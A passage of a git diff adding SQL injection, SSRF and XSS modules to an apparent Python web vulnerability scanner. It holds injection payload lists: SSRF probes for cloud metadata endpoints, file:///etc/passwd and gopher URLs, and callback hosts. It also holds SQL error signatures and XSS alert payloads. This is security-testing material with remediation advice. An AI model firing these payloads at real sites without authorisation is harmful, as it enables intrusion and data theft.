+            "SQL syntax.*?MySQL", "Warning.*?mysqli", "MySQLSyntaxErrorException",
+            "valid MySQL result", "check the manual that corresponds to your (MySQL|MariaDB) server version",
+            "MySqlClient\\.", "com\\.mysql\\.jdbc", "Zend_Db_(Adapter|Statement)_Mysqli_Exception",
+            "SQLSTATE\\[\\d+\\]: Syntax error or access violation", "Uncaught mysqli_sql_exception",
+            
+            "ORA-[0-9][0-9][0-9][0-9]", "Oracle error", "Oracle.*?Driver", "Warning.*?oci_.*", "OracleConnection",
+            "quoted string not properly terminated", "ORA-00936: missing expression",
+            
+            "Microsoft SQL Server", "MSSQL.*?Driver", "MSSQL.*?Exception", "Msg \\d+, Level \\d+, State \\d+",
+            "Unclosed quotation mark after the character string", "Incorrect syntax near",
+            
+            "PostgreSQL.*?ERROR", "Warning.*?Pg_.*", "valid PostgreSQL result", "PgSqlException",
+            "PSQLException", "org\\.postgresql\\.util\\.PSQLException",
+            
+            "CLI Driver.*?DB2", "DB2 SQL error", "db2_\\w+\\(",
+            
+            "SQLite3::query", "SQLite3Result", "SQLitException",
+            
+            "Warning.*?sqlite_.*?", "Warning.*?PDO::.*?",
+            
+            "HY000", "Dynamic SQL Error", "System\\.Data\\.SqlClient\\.SqlException", 
+            "Exception.*?Sybase.*?", "Sybase message", "Sybase.*?Server message"
+        ]
+    
+    def scan_form(self, url, form, field):
+        """
+        扫描表单中的SQL注入漏洞
+        
+        Args:
+            url: 页面URL
+            form: 表单信息
+            field: 字段信息
+            
+        Returns:
+            dict: 漏洞信息，如果没有发现漏洞则返回None
+        """
+        if not field.get('name'):
+            return None
+            
+        logger.debug(f"扫描SQL注入: {field.get('name')} @ {url}")
+        
+        # 获取表单提交URL
+        action_url = form['action'] if form['action'] else url
+        
+        # 获取表单方法
+        method = form['method'].upper()
+        
+        # 构建基准表单数据，用于比较
+        base_form_data = {}
+        for f in form.get('fields', []):
+            if f.get('name'):
+                # 对于目标字段使用无害值
+                if f['name'] == field['name']:
+                    # 根据字段类型选择适当的测试值
+                    if field.get('type') == 'email' or 'email' in field.get('name', '').lower():
+                        base_form_data[f['name']] = 'test@example.com'
+                    else:
+                        base_form_data[f['name']] = 'test123'
+                else:
+                    base_form_data[f['name']] = f.get('value', '')
+        
+        # 发送基准请求
+        if method == 'POST':
+            base_response = self.http_client.post(action_url, data=base_form_data)
+        else:
+            base_response = self.http_client.get(action_url, params=base_form_data)
+            
+        if not base_response:
+            return None
+            
+        # 检查字段是否为email类型或名称包含email
+        is_email_field = field.get('type') == 'email' or 'email' in field.get('name', '').lower()
+        
+        # 测试基于错误的SQL注入
+        payloads_to_test = self.payloads['error_based']
+        
+        # 如果是email字段，优先使用email特定的有效载荷
+        if is_email_field:
+            logger.info(f"检测到Email字段: {field.get('name')}，使用特定的SQL注入测试")
+            payloads_to_test = self.payloads['email_specific'] + payloads_to_test
+            
+        for payload in payloads_to_test:
+            # 构建注入表单数据
+            inject_form_data = base_form_data.copy()
+            inject_form_data[field['name']] = payload
+            
+            # 发送注入请求
+            if method == 'POST':
+                inject_response = self.http_client.post(action_url, data=inject_form_data)
+            else:
+                inject_response = self.http_client.get(action_url, params=inject_form_data)
+                
+            if not inject_response:
+                continue
+                
+            # 检查是否有SQL错误
+            if self._check_sql_errors(inject_response.text):
+                return {
+                    'type': 'SQL_INJECTION',
+                    'subtype': 'Error-based SQL Injection',
+                    'url': url,
+                    'form_action': action_url,
+                    'form_method': method,
+                    'parameter': field['name'],
+                    'payload': payload,
+                    'severity': '高',
+                    'description': f"在表单字段'{field['name']}'中发现基于错误的SQL注入漏洞",
+                    'details': {
+                        "漏洞位置": f"表单提交到{action_url}的{field['name']}字段",
+                        "漏洞类型": "基于错误的SQL注入",
+                        "有效载荷": payload,
+                        "风险": "攻击者可能能够执行任意SQL查询，访问或修改数据库内容"
+                    },
+                    'recommendation': "使用参数化查询或预处理语句，对用户输入进行严格过滤，限制数据库账户权限"
+                }
+        
+        # 测试基于时间的SQL注入
+        for payload in self.payloads['time_based']:
+            # 构建注入表单数据
+            inject_form_data = base_form_data.copy()
+            inject_form_data[field['name']] = payload
+            
+            # 记录开始时间
+            start_time = time.time()
+            
+            # 发送注入请求
+            if method == 'POST':
+                inject_response = self.http_client.post(action_url, data=inject_form_data)
+            else:
+                inject_response = self.http_client.get(action_url, params=inject_form_data)
+                
+            # 计算响应时间
+            response_time = time.time() - start_time
+            
+            # 如果响应时间超过了预期的延迟时间（考虑网络延迟），则可能存在时间盲注
+            if response_time > 2.5:  # 考虑到网络延迟，使用略小于3秒的阈值
+                return {
+                    'type': 'SQL_INJECTION',
+                    'subtype': 'Time-based SQL Injection',
+                    'url': url,
+                    'form_action': action_url,
+                    'form_method': method,
+                    'parameter': field['name'],
+                    'payload': payload,
+                    'severity': '高',
+                    'description': f"在表单字段'{field['name']}'中发现基于时间的SQL注入漏洞",
+                    'details': f"表单提交到{action_url}的{field['name']}字段存在基于时间的SQL注入漏洞，响应时间为{response_time:.2f}秒",
+                    'recommendation': "使用参数化查询或预处理语句，过滤用户输入，限制数据库权限"
+                }
+        
+        # 测试基于布尔的SQL注入
+        boolean_results = {}
+        for payload in self.payloads['boolean_based']:
+            # 构建注入表单数据
+            inject_form_data = base_form_data.copy()
+            inject_form_data[field['name']] = payload
+            
+            # 发送注入请求
+            if method == 'POST':
+                inject_response = self.http_client.post(action_url, data=inject_form_data)
+            else:
+                inject_response = self.http_client.get(action_url, params=inject_form_data)
+                
+            if not inject_response:
+                continue
+                
+            # 记录响应内容和长度
+            response_content = inject_response.text if hasattr(inject_response, 'text') else ''
+            response_length = len(response_content)
+            
+            # 提取payload的逻辑部分，如1=1或1=2
+            if "1=1" in payload or "'1'='1'" in payload or "\"1\"=\"1\"" in payload:
+                logic_type = 'TRUE'
+            else:
+                logic_type = 'FALSE'
+                
+            # 记录结果
+            if logic_type not in boolean_results:
+                boolean_results[logic_type] = {
+                    'content': response_content,
+                    'length': response_length,
+                    'payload': payload
+                }
+            elif logic_type == 'TRUE' and response_length > boolean_results[logic_type]['length']:
+                boolean_results[logic_type] = {
+                    'content': response_content,
+                    'length': response_length,
+                    'payload': payload
+                }
+            elif logic_type == 'FALSE' and response_length < boolean_results[logic_type]['length']:
+                boolean_results[logic_type] = {
+                    'content': response_content,
+                    'length': response_length,
+                    'payload': payload
+                }
+        
+        # 如果收集到了两种逻辑的结果，比较它们
+        if 'TRUE' in boolean_results and 'FALSE' in boolean_results:
+            true_length = boolean_results['TRUE']['length']
+            false_length = boolean_results['FALSE']['length']
+            
+            # 如果长度差异明显，则可能存在布尔盲注
+            if abs(true_length - false_length) > 10:
+                return {
+                    'type': 'SQL_INJECTION',
+                    'subtype': 'Boolean-based SQL Injection',
+                    'url': url,
+                    'form_action': action_url,
+                    'form_method': method,
+                    'parameter': field['name'],
+                    'payload': boolean_results['TRUE']['payload'],
+                    'severity': '高',
+                    'description': f"在表单字段'{field['name']}'中发现基于布尔的SQL注入漏洞",
+                    'details': f"表单提交到{action_url}的{field['name']}字段存在布尔盲注漏洞，TRUE条件下响应长度为{true_length}，FALSE条件下响应长度为{false_length}",
+                    'recommendation': "使用参数化查询或预处理语句，过滤用户输入，限制数据库权限"
+                }
+            
+            # 如果内容差异明显，则可能存在布尔盲注
+            true_content = boolean_results['TRUE']['content']
+            false_content = boolean_results['FALSE']['content']
+            similarity = SequenceMatcher(None, true_content, false_content).ratio()
+            
+            if similarity < 0.9:  # 相似度低于90%
+                return {
+                    'type': 'SQL_INJECTION',
+                    'subtype': 'Boolean-based SQL Injection',
+                    'url': url,
+                    'form_action': action_url,
+                    'form_method': method,
+                    'parameter': field['name'],
+                    'payload': boolean_results['TRUE']['payload'],
+                    'severity': '高',
+                    'description': f"在表单字段'{field['name']}'中发现基于布尔的SQL注入漏洞",
+                    'details': f"表单提交到{action_url}的{field['name']}字段存在布尔盲注漏洞，TRUE和FALSE条件下的响应内容相似度为{similarity:.2f}",
+                    'recommendation': "使用参数化查询或预处理语句，过滤用户输入，限制数据库权限"
+                }
+                
+        return None
+    
+    def scan_parameter(self, url, param):
+        """
+        扫描URL参数中的SQL注入漏洞
+        
+        Args:
+            url: 页面URL
+            param: 参数名
+            
+        Returns:
+            dict: 漏洞信息，如果没有发现漏洞则返回None
+        """
+        logger.debug(f"扫描SQL注入参数: {param} @ {url}")
+        
+        # 解析URL
+        parsed_url = urlparse(url)
+        
+        # 解析查询参数
+        query_params = dict(parse_qsl(parsed_url.query))
+        
+        # 如果参数不在查询字符串中，则跳过
+        if param not in query_params:
+            return None
+            
+        # 获取参数原始值
+        original_value = query_params[param]
+        
+        # 检查参数是否可能是email
+        is_email_param = 'email' in param.lower() or (original_value and '@' in original_value and '.' in original_value.split('@')[1])
+        
+        # 构建基准URL
+        base_url = f"{parsed_url.scheme}://{parsed_url.netloc}{parsed_url.path}"
+        
+        # 发送基准请求
+        base_response = self.http_client.get(url)
+        
+        if not base_response:
+            return None
+            
+        # 测试基于错误的SQL注入
+        payloads_to_test = self.payloads['error_based']
+        
+        # 如果是email参数，使用email特定的有效载荷
+        if is_email_param:
+            logger.info(f"检测到Email参数: {param}，使用特定的SQL注入测试")
+            payloads_to_test = self.payloads['email_specific'] + payloads_to_test
+        
+        for payload in payloads_to_test:
+            # 构建注入参数
+            inject_params = query_params.copy()
+            inject_params[param] = payload
+            
+            # 构建注入URL
+            inject_url = f"{base_url}?{urlencode(inject_params)}"
+            
+            # 发送注入请求
+            inject_response = self.http_client.get(inject_url)
+            
+            if not inject_response:
+                continue
+                
+            # 检查是否有SQL错误
+            if self._check_sql_errors(inject_response.text):
+                return {
+                    'type': 'SQL_INJECTION',
+                    'subtype': 'Error-based SQL Injection',
+                    'url': url,
+                    'parameter': param,
+                    'payload': payload,
+                    'severity': '高',
+                    'description': f"在URL参数'{param}'中发现基于错误的SQL注入漏洞",
+                    'details': {
+                        "漏洞位置": f"URL参数{param}",
+                        "漏洞类型": "基于错误的SQL注入",
+                        "有效载荷": payload,
+                        "风险": "攻击者可能能够执行任意SQL查询，访问或修改数据库内容"
+                    },
+                    'recommendation': "使用参数化查询或预处理语句，对用户输入进行严格过滤，限制数据库账户权限"
+                }
+        
+        # 测试基于时间的SQL注入
+        for payload in self.payloads['time_based']:
+            # 构建注入参数
+            inject_params = query_params.copy()
+            inject_params[param] = payload
+            
+            # 构建注入URL
+            inject_url = f"{base_url}?{urlencode(inject_params)}"
+            
+            # 记录开始时间
+            start_time = time.time()
+            
+            # 发送注入请求
+            inject_response = self.http_client.get(inject_url)
+            
+            # 计算响应时间
+            response_time = time.time() - start_time
+            
+            # 如果响应时间超过了预期的延迟时间（考虑网络延迟），则可能存在时间盲注
+            if response_time > 2.5:  # 考虑到网络延迟，使用略小于3秒的阈值
+                return {
+                    'type': 'SQL_INJECTION',
+                    'subtype': 'Time-based SQL Injection',
+                    'url': url,
+                    'parameter': param,
+                    'payload': payload,
+                    'severity': '高',
+                    'description': f"在URL参数'{param}'中发现基于时间的SQL注入漏洞",
+                    'details': f"URL参数{param}存在基于时间的SQL注入漏洞，响应时间为{response_time:.2f}秒",
+                    'recommendation': "使用参数化查询或预处理语句，过滤用户输入，限制数据库权限"
+                }
+        
+        # 测试基于布尔的SQL注入
+        boolean_results = {}
+        for payload in self.payloads['boolean_based']:
+            # 构建注入参数
+            inject_params = query_params.copy()
+            inject_params[param] = payload
+            
+            # 构建注入URL
+            inject_url = f"{base_url}?{urlencode(inject_params)}"
+            
+            # 发送注入请求
+            inject_response = self.http_client.get(inject_url)
+            
+            if not inject_response:
+                continue
+                
+            # 记录响应内容和长度
+            response_content = inject_response.text if hasattr(inject_response, 'text') else ''
+            response_length = len(response_content)
+            
+            # 提取payload的逻辑部分，如1=1或1=2
+            if "1=1" in payload or "'1'='1'" in payload or "\"1\"=\"1\"" in payload:
+                logic_type = 'TRUE'
+            else:
+                logic_type = 'FALSE'
+                
+            # 记录结果
+            if logic_type not in boolean_results:
+                boolean_results[logic_type] = {
+                    'content': response_content,
+                    'length': response_length,
+                    'payload': payload
+                }
+            elif logic_type == 'TRUE' and response_length > boolean_results[logic_type]['length']:
+                boolean_results[logic_type] = {
+                    'content': response_content,
+                    'length': response_length,
+                    'payload': payload
+                }
+            elif logic_type == 'FALSE' and response_length < boolean_results[logic_type]['length']:
+                boolean_results[logic_type] = {
+                    'content': response_content,
+                    'length': response_length,
+                    'payload': payload
+                }
+        
+        # 如果收集到了两种逻辑的结果，比较它们
+        if 'TRUE' in boolean_results and 'FALSE' in boolean_results:
+            true_length = boolean_results['TRUE']['length']
+            false_length = boolean_results['FALSE']['length']
+            
+            # 如果长度差异明显，则可能存在布尔盲注
+            if abs(true_length - false_length) > 10:
+                return {
+                    'type': 'SQL_INJECTION',
+                    'subtype': 'Boolean-based SQL Injection',
+                    'url': url,
+                    'parameter': param,
+                    'payload': boolean_results['TRUE']['payload'],
+                    'severity': '高',
+                    'description': f"在URL参数'{param}'中发现基于布尔的SQL注入漏洞",
+                    'details': f"URL参数{param}存在布尔盲注漏洞，TRUE条件下响应长度为{true_length}，FALSE条件下响应长度为{false_length}",
+                    'recommendation': "使用参数化查询或预处理语句，过滤用户输入，限制数据库权限"
+                }
+            
+            # 如果内容差异明显，则可能存在布尔盲注
+            true_content = boolean_results['TRUE']['content']
+            false_content = boolean_results['FALSE']['content']
+            similarity = SequenceMatcher(None, true_content, false_content).ratio()
+            
+            if similarity < 0.9:  # 相似度低于90%
+                return {
+                    'type': 'SQL_INJECTION',
+                    'subtype': 'Boolean-based SQL Injection',
+                    'url': url,
+                    'parameter': param,
+                    'payload': boolean_results['TRUE']['payload'],
+                    'severity': '高',
+                    'description': f"在URL参数'{param}'中发现基于布尔的SQL注入漏洞",
+                    'details': f"URL参数{param}存在布尔盲注漏洞，TRUE和FALSE条件下的响应内容相似度为{similarity:.2f}",
+                    'recommendation': "使用参数化查询或预处理语句，过滤用户输入，限制数据库权限"
+                }
+                
+        return None
+    
+    def _check_sql_errors(self, content):
+        """
+        检查响应内容是否包含SQL错误
+        
+        Args:
+            content: 响应内容
+            
+        Returns:
+            bool: 是否包含SQL错误
+        """
+        error_patterns = [
+            # MySQL
+            "You have an error in your SQL syntax",
+            "Warning: mysql_",
+            "MySQL Error",
+            "MySQL ODBC",
+            "MySQL Driver",
+            "mysqli_",
+            "mysqli.query",
+            "Unclosed quotation mark after the character string",
+            "SQL syntax.*?MySQL",
+            "Warning.*?mysqli",
+            
+            # PostgreSQL
+            "PostgreSQL.*?ERROR",
+            "Warning.*?\\Wpg_",
+            "valid PostgreSQL result",
+            "PostgreSQL query failed",
+            "org.postgresql.util.PSQLException",
+            
+            # Microsoft SQL Server
+            "Microsoft SQL Server",
+            "ODBC SQL Server Driver",
+            "ODBC Driver.*?SQL Server",
+            "SQLServer JDBC Driver",
+            "SqlException",
+            "Unclosed quotation mark after the character string",
+            "mssql_query()",
+            "System\\.Data\\.SqlClient\\.",
+            "Exception.*?\\WSystem.Data.SqlClient.",
+            "Exception.*?\\WServer.SqlException",
+            
+            # Oracle
+            "ORA-[0-9][0-9][0-9][0-9]",
+            "Oracle error",
+            "Oracle.*?Driver",
+            "Warning.*?\\Woci_",
+            "Oracle.*?Database",
+            
+            # SQLite
+            "SQLite/JDBCDriver",
+            "SQLite\\.Exception",
+            "System\\.Data\\.SQLite\\.SQLiteException",
+            "Warning.*?sqlite_",
+            
+            # 通用模式
+            "SQL syntax.*?error",
+            "Incorrect syntax near",
+            "Syntax error.*?in query expression",
+            "Unexpected end of command in statement",
+            "Unexpected token.*?in statement",
+            "SQL ERROR",
+            "SQL Error",
+            "SQLSTATE",
+            "\\[SQL Server\\]",
+            "ODBC Driver",
+            "syntax error",
+            "Division by zero",
+            "Unable to connect to database",
+            "Database error",
+            "DB Error",
+            "query failed",
+            "Unable to execute query",
+            "Invalid SQL",
+            "Database connection error",
+            "SQL command.*?not properly ended",
+            "Malformed query",
+            "Object reference not set to an instance",
+            "DatabaseException",
+            "DBD::mysql::st",
+            "SQL STATE",
+            "JDBC Driver",
+            "java.sql.SQLException",
+            "JSQLConnect",
+            "JET Database Engine",
+            "Access Database Engine",
+            "Driver.*?SQL",
+            "Invalid column name",
+            "Column.*?not found",
+            "Table.*?not found",
+            "expects parameter",
+            "Data type mismatch",
+            "expects parameter",
+            "Internal Server Error",
+            "Server Error in.*?Application",
+            "CLI Driver",
+            "ADODB",
+            "ADOConnection",
+            "MySQLSyntaxErrorException",
+            "SqliteException",
+            "InvalidSqlException",
+            "SQL statement was not properly terminated"
+        ]
+        
+        for pattern in error_patterns:
+            if re.search(pattern, content, re.IGNORECASE):
+                return True
+                
+        return False
+    
+    def can_scan_form(self):
+        """是否可以扫描表单"""
+        return True
+    
+    def can_scan_params(self):
+        """是否可以扫描URL参数"""
+        return True 
\ No newline at end of file
diff --git a/xss_scanner/scanners/ssrf_scanner.py b/xss_scanner/scanners/ssrf_scanner.py
new file mode 100644
index 0000000..a8d6d29
--- /dev/null
+++ b/xss_scanner/scanners/ssrf_scanner.py
@@ -0,0 +1,351 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+
+"""
+SSRF（服务器端请求伪造）扫描器模块，负责扫描SSRF漏洞
+"""
+
+import re
+import logging
+import random
+import string
+import time
+import uuid
+from urllib.parse import urlparse, urlencode, parse_qsl, unquote
+
+logger = logging.getLogger('xss_scanner')
+
+class SSRFScanner:
+    """SSRF扫描器类，负责扫描服务器端请求伪造漏洞"""
+    
+    def __init__(self, http_client):
+        """
+        初始化SSRF扫描器
+        
+        Args:
+            http_client: HTTP客户端对象
+        """
+        self.http_client = http_client
+        
+        # 生成唯一标识符，用于检测SSRF漏洞
+        self.ssrf_id = str(uuid.uuid4()).replace('-', '')[:16]
+        
+        # SSRF检测域名
+        # 注意：在实际使用中，应该使用攻击者控制的服务器
+        # 这里提供的域名仅用于演示目的，需要替换为实际的回调服务器
+        self.callback_domain = f"https://ssrf-check.example.com/{self.ssrf_id}"
+        self.burp_collaborator = f"http://{self.ssrf_id}.burpcollaborator.net"
+        self.interact_domain = f"http://{self.ssrf_id}.interact.sh"
+        
+        # SSRF检测Payload
+        self.payloads = [
+            # 基本检测
+            self.callback_domain,
+            self.burp_collaborator,
+            self.interact_domain,
+            
+            # IP形式
+            "http://127.0.0.1",
+            "http://localhost",
+            "http://[::1]",
+            "http://0.0.0.0",
+            "http://0177.0000.0000.0001",  # 127.0.0.1的八进制表示
+            "http://2130706433",  # 127.0.0.1的整数表示
+            "http://0x7f.0x0.0x0.0x1",  # 127.0.0.1的十六进制表示
+            
+            # 内网 IP 范围
+            "http://10.0.0.1",
+            "http://172.16.0.1",
+            "http://192.168.0.1",
+            "http://169.254.169.254",  # AWS元数据
+            "http://metadata.google.internal",  # GCP元数据
+            
+            # 不同端口
+            "http://127.0.0.1:22",  # SSH
+            "http://127.0.0.1:3306",  # MySQL
+            "http://127.0.0.1:5432",  # PostgreSQL
+            "http://127.0.0.1:6379",  # Redis
+            "http://127.0.0.1:9200",  # Elasticsearch
+            "http://127.0.0.1:8080",  # 常见Web端口
+            
+            # 不同协议
+            "https://127.0.0.1",
+            "ftp://127.0.0.1",
+            "gopher://127.0.0.1:25/",  # SMTP
+            "file:///etc/passwd",
+            "dict://127.0.0.1:6379/info",  # Redis
+            
+            # 平台相关
+            "http://169.254.169.254/latest/meta-data/",  # AWS
+            "http://metadata.google.internal/computeMetadata/v1/",  # GCP
+            "http://169.254.169.254/metadata/v1/",  # DigitalOcean
+            "http://169.254.169.254/metadata",  # Azure
+            
+            # URL编码绕过
+            "http://%31%32%37%2e%30%2e%30%2e%31",  # 127.0.0.1
+            "http://127.0.0.1%23@example.com",  # 使用URL片段
+            "http://127.0.0.1%2f@example.com",  # 使用斜杠
+            
+            # DNS重绑定攻击
+            f"http://{self.ssrf_id}.example.com",  # 会解析到内网IP
+            
+            # 使用用户名密码形式
+            "http://user:pass@127.0.0.1",
+            
+            # 空字节绕过 (适用于某些语言)
+            "http://127.0.0.1%00",
+            
+            # 使用域名 + 解析到内部IP的域名
+            "http://spoofed.burpcollaborator.net",
+            
+            # 利用重定向的SSRF
+            "http://redirector.example.com/?url=http://127.0.0.1"
+        ]
+        
+        # 可能的SSRF成功特征
+        self.success_patterns = [
+            # 服务器响应特征
+            "ssh-[0-9].[0-9]", # SSH banner
+            "mysql", # MySQL
+            "postgresql", # PostgreSQL
+            "redis_version", # Redis
+            "elastic", # Elasticsearch
+            "instance-id", # AWS metadata
+            "metadata", # Cloud metadata
+            "computeMetadata", # GCP metadata
+            
+            # 常见HTTP回显内容
+            "<!DOCTYPE html>",
+            "<html",
+            "<head",
+            "<body",
+            
+            # 系统文件特征
+            "root:.*:0:0:",
+            "bin:.*:1:1:",
+            
+            # 错误消息特征
+            "Connection refused",
+            "No route to host",
+            "Name or service not known",
+            "Network is unreachable",
+            
+            # 特定应用程序的特征
+            "Apache",
+            "nginx",
+            "IIS",
+            "Express",
+            "Tomcat",
+            
+            # HTTP头
+            "X-Powered-By:",
+            "Server:",
+            
+            # 自定义回调标记
+            self.ssrf_id
+        ]
+    
+    def scan_form(self, url, form, field):
+        """
+        扫描表单中的SSRF漏洞
+        
+        Args:
+            url: 页面URL
+            form: 表单信息
+            field: 字段信息
+            
+        Returns:
+            dict: 漏洞信息，如果没有发现漏洞则返回None
+        """
+        if not field.get('name'):
+            return None
+            
+        # 可能存在SSRF的字段名称
+        ssrf_prone_fields = [
+            'url', 'uri', 'link', 'host', 'ip', 'address', 'target', 'site',
+            'website', 'web', 'src', 'source', 'dest', 'destination', 'redirect',
+            'redirect_to', 'redirect_url', 'callback', 'api', 'endpoint',
+            'webhook', 'proxy', 'fetch', 'resource', 'feed', 'service',
+            'location', 'remote', 'forward', 'next', 'continue', 'return',
+            'return_url', 'continue_url', 'next_url', 'request'
+        ]
+        
+        # 如果字段名不包含敏感关键词，则跳过扫描
+        field_name_lower = field['name'].lower()
+        if not any(keyword in field_name_lower for keyword in ssrf_prone_fields):
+            return None
+            
+        logger.debug(f"扫描SSRF: {field['name']} @ {url}")
+        
+        # 获取表单提交URL
+        action_url = form['action'] if form['action'] else url
+        
+        # 获取表单方法
+        method = form['method'].upper()
+        
+        # 检测SSRF漏洞
+        for payload in self.payloads:
+            # 构建表单数据
+            form_data = {}
+            
+            # 填充所有字段
+            for f in form.get('fields', []):
+                if f.get('name'):
+                    # 如果是目标字段，则使用Payload
+                    if f['name'] == field['name']:
+                        form_data[f['name']] = payload
+                    else:
+                        # 否则使用默认值
+                        form_data[f['name']] = f.get('value', '')
+            
+            # 发送请求
+            try:
+                logger.debug(f"测试Payload: {payload}")
+                
+                if method == 'POST':
+                    response = self.http_client.post(action_url, data=form_data)
+                else:
+                    response = self.http_client.get(action_url, params=form_data)
+                    
+                if not response:
+                    continue
+                    
+                # 检查响应中是否包含成功特征
+                if self._check_ssrf_success(response.text):
+                    return {
+                        'type': 'SSRF',
+                        'url': url,
+                        'form_action': action_url,
+                        'form_method': method,
+                        'parameter': field['name'],
+                        'payload': payload,
+                        'severity': '高',
+                        'description': f"在表单字段'{field['name']}'中发现服务器端请求伪造(SSRF)漏洞",
+                        'details': f"表单提交到{action_url}的{field['name']}字段存在SSRF漏洞，可以访问内部网络资源",
+                        'recommendation': "实施URL白名单，使用间接引用，禁止访问内部网络资源，限制响应大小和类型"
+                    }
+                    
+                # 在实际环境中，还需要检查回调服务器是否收到了请求
+                # 由于这是模拟环境，该步骤被省略
+            except Exception as e:
+                logger.error(f"扫描SSRF时发生错误: {str(e)}")
+                
+        return None
+    
+    def scan_parameter(self, url, param):
+        """
+        扫描URL参数中的SSRF漏洞
+        
+        Args:
+            url: 页面URL
+            param: 参数名
+            
+        Returns:
+            dict: 漏洞信息，如果没有发现漏洞则返回None
+        """
+        # 可能存在SSRF的参数名称
+        ssrf_prone_params = [
+            'url', 'uri', 'link', 'host', 'ip', 'address', 'target', 'site',
+            'website', 'web', 'src', 'source', 'dest', 'destination', 'redirect',
+            'redirect_to', 'redirect_url', 'callback', 'api', 'endpoint',
+            'webhook', 'proxy', 'fetch', 'resource', 'feed', 'service',
+            'location', 'remote', 'forward', 'next', 'continue', 'return',
+            'return_url', 'continue_url', 'next_url', 'request'
+        ]
+        
+        # 如果参数名不包含敏感关键词，则跳过扫描
+        param_lower = param.lower()
+        if not any(keyword in param_lower for keyword in ssrf_prone_params):
+            return None
+            
+        logger.debug(f"扫描SSRF参数: {param} @ {url}")
+        
+        # 解析URL
+        parsed_url = urlparse(url)
+        
+        # 获取查询参数
+        query_params = dict(parse_qsl(parsed_url.query))
+        
+        # 如果参数不存在，则添加
+        if param not in query_params:
+            query_params[param] = ""
+            
+        # 构建基础URL
+        base_url = f"{parsed_url.scheme}://{parsed_url.netloc}{parsed_url.path}"
+        
+        # 检测SSRF漏洞
+        for payload in self.payloads:
+            # 构建注入参数
+            inject_params = query_params.copy()
+            inject_params[param] = payload
+            
+            # 构建测试URL
+            query_string = urlencode(inject_params)
+            test_url = f"{base_url}?{query_string}"
+            
+            try:
+                logger.debug(f"测试Payload: {payload}")
+                
+                # 发送请求
+                response = self.http_client.get(test_url)
+                if not response:
+                    continue
+                    
+                # 检查响应中是否包含成功特征
+                if self._check_ssrf_success(response.text):
+                    return {
+                        'type': 'SSRF',
+                        'url': url,
+                        'parameter': param,
+                        'payload': payload,
+                        'severity': '高',
+                        'description': f"在URL参数'{param}'中发现服务器端请求伪造(SSRF)漏洞",
+                        'details': f"URL参数{param}存在SSRF漏洞，可以访问内部网络资源",
+                        'recommendation': "实施URL白名单，使用间接引用，禁止访问内部网络资源，限制响应大小和类型"
+                    }
+                    
+                # 在实际环境中，还需要检查回调服务器是否收到了请求
+                # 由于这是模拟环境，该步骤被省略
+            except Exception as e:
+                logger.error(f"扫描SSRF参数时发生错误: {str(e)}")
+                
+        return None
+    
+    def _check_ssrf_success(self, content):
+        """
+        检查响应内容中是否包含SSRF成功的特征
+        
+        Args:
+            content: 响应内容
+            
+        Returns:
+            bool: 是否包含SSRF成功特征
+        """
+        if not content:
+            return False
+            
+        # 检查成功特征
+        for pattern in self.success_patterns:
+            if re.search(pattern, content, re.IGNORECASE):
+                return True
+                
+        return False
+    
+    def check_callback_server(self):
+        """
+        检查回调服务器是否收到请求（在实际环境中实现）
+        
+        Returns:
+            bool: 是否收到回调请求
+        """
+        # 此功能在实际环境中需要实现
+        # 这里只是一个占位函数
+        return False
+    
+    def can_scan_form(self):
+        """是否可以扫描表单"""
+        return True
+    
+    def can_scan_params(self):
+        """是否可以扫描URL参数"""
+        return True 
\ No newline at end of file
diff --git a/xss_scanner/scanners/xss_scanner.py b/xss_scanner/scanners/xss_scanner.py
new file mode 100644
index 0000000..2fd672a
--- /dev/null
+++ b/xss_scanner/scanners/xss_scanner.py
@@ -0,0 +1,1330 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+
+"""
+XSS扫描器模块，负责扫描XSS漏洞
+"""
+
+import re
+import logging
+import random
+import string
+import time
+import base64
+from urllib.parse import urlparse, urlencode, parse_qsl, unquote
+from bs4 import BeautifulSoup
+
+try:
+    from selenium import webdriver
+    from selenium.webdriver.chrome.options import Options
+    from selenium.common.exceptions import TimeoutException, WebDriverException
+    SELENIUM_AVAILABLE = True
+except ImportError:
+    SELENIUM_AVAILABLE = False
+
+from xss_scanner.utils.tech_detector import TechDetector
+
+logger = logging.getLogger('xss_scanner')
+
+class XSSScanner:
+    """XSS扫描器类，负责扫描XSS漏洞"""
+    
+    def __init__(self, http_client, payload_level=2, use_browser=False):
+        """
+        初始化XSS扫描器
+        
+        Args:
+            http_client: HTTP客户端对象
+            payload_level: Payload复杂度级别，1-基础，2-标准，3-高级
+            use_browser: 是否使用真实浏览器检测
+        """
+        self.http_client = http_client
+        self.payload_level = payload_level
+        self.use_browser = use_browser and SELENIUM_AVAILABLE
+        self.driver = None
+        
+        # 初始化技术检测器
+        self.tech_detector = TechDetector()
+        
+        # 存储检测到的技术信息
+        self.tech_info = {
+            'frontend': [],
+            'backend': [],
+            'server': [],
+            'waf': []
+        }
+        
+        # 初始化浏览器
+        if self.use_browser:
+            self._init_browser()
+            
+        # 随机生成的标记，用于检测XSS漏洞
+        self.xss_mark = self._generate_random_string(8)
+        
+        # 加载XSS Payload
+        self.payloads = self._load_payloads()
+        
+        # 加载WAF绕过Payload
+        self.waf_bypass_payloads = self._load_payloads_from_file('xss_waf_bypass.txt')
+    
+    def _init_browser(self):
+        """初始化浏览器"""
+        if not SELENIUM_AVAILABLE:
+            logger.warning("未安装Selenium，无法使用浏览器功能")
+            self.use_browser = False
+            return
+            
+        try:
+            chrome_options = Options()
+            chrome_options.add_argument('--headless')
+            chrome_options.add_argument('--disable-gpu')
+            chrome_options.add_argument('--no-sandbox')
+            chrome_options.add_argument('--disable-dev-shm-usage')
+            chrome_options.add_argument('--disable-extensions')
+            chrome_options.add_argument('--disable-notifications')
+            
+            self.driver = webdriver.Chrome(options=chrome_options)
+            self.driver.set_page_load_timeout(10)
+            logger.info("浏览器初始化成功")
+        except Exception as e:
+            logger.error(f"浏览器初始化失败: {str(e)}")
+            self.use_browser = False
+    
+    def _load_payloads(self):
+        """
+        加载XSS Payload
+        
+        Returns:
+            list: XSS Payload列表
+        """
+        # 尝试从文件加载Payload
+        filename = f"xss_level{self.payload_level}.txt"
+        file_payloads = self._load_payloads_from_file(filename)
+        
+        if file_payloads:
+            return file_payloads
+        
+        # 如果文件加载失败，则使用内置的Payload
+        # 基础XSS Payload，适用于所有场景
+        basic_payloads = [
+            f"<script>alert('{self.xss_mark}')</script>",
+            f"<img src=x onerror=alert('{self.xss_mark}')>",
+            f"<svg onload=alert('{self.xss_mark}')>",
